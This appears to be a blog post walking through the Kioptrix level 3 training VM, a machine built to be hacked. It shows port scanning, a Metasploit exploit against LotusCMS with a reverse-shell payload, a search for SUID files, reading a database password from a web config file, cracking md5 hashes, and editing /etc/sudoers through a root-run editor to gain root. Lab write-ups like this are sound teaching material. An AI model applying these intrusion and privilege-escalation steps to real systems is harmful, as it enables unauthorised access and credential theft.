[Hacking series] – Kioptrix level 3

Written by  on June 8, 2015 

Code name: Kioptrix3

Webpage: http://kioptrix.com/

VM Download: www.kioptrix.com/dlvm/KVM3.rar

Challange: Get root on the system

First of all, let’s see wich ports are open.

# nmap -p- -Pn -A


Port 80 open, as usual, let’s browse it


Ligoat? Uhm, we can dig a litle deeper.


jackpot! So LotusCMS huh..

We can search that on some exploit databases such as metasploit or the exploit db to see if we can find something useful.

# msfconsole

msf > search lotus


Exploit found? Lets try this one

msf > set RHOST

msf > set URI /


We can also set the payload and edit it’s options

msf > set LHOST

msf > set LPORT 8723


And then just run the exploit

msf > exploit


Now we are in, but our shell is not privileged, we must try to find a way to escalate our privileges on the system. One way to do that is to find some special files that can always be run as the (user)owner, the (group)owner or the (directory)owner. We can perform a search to look for files that are always executed as the user owner with:

$ find / -perm -u=s -type f 2>/dev/null


And we found an interesting one, /usr/local/bin/ht

But if we try to open it from our shell…


Damn, we will need a full interective shell for that. ssh will do the job, but we need to find a valid user and it’s password… we need to dig deeper in the system.


After a quick research, we found that on the web public directory. As the webapp works with php-mysql, we can find the mysql db admin password stored in plain text inside the webapp configuration file!


Nice! Now we can try to log in with these credentials, we can log into phpmyadmin as we found it using nikto


After looking inside the database’s tables, we found 2 interesting entries


Looks like passwords are stored using md5, we can decrypt it using some public md5 hash database


Password found, now we can login via ssh


We are in, now that we got a full interactive shell, we can go back and execute ht


Let’s see


Looks like a text editor, as we are running it with root privileges, we can try to open or edit some interesting file. 2 interesting files can be /etc/sudoers and /etc/shadow


After opening the file, we can edit it.


I’ve edited /etc/sudoers and granted all privileges on the user loneferret. Now we can just run

# sudo su

And get root


Game over kioptrix3 P-)

Category : hacking series

Leave a Reply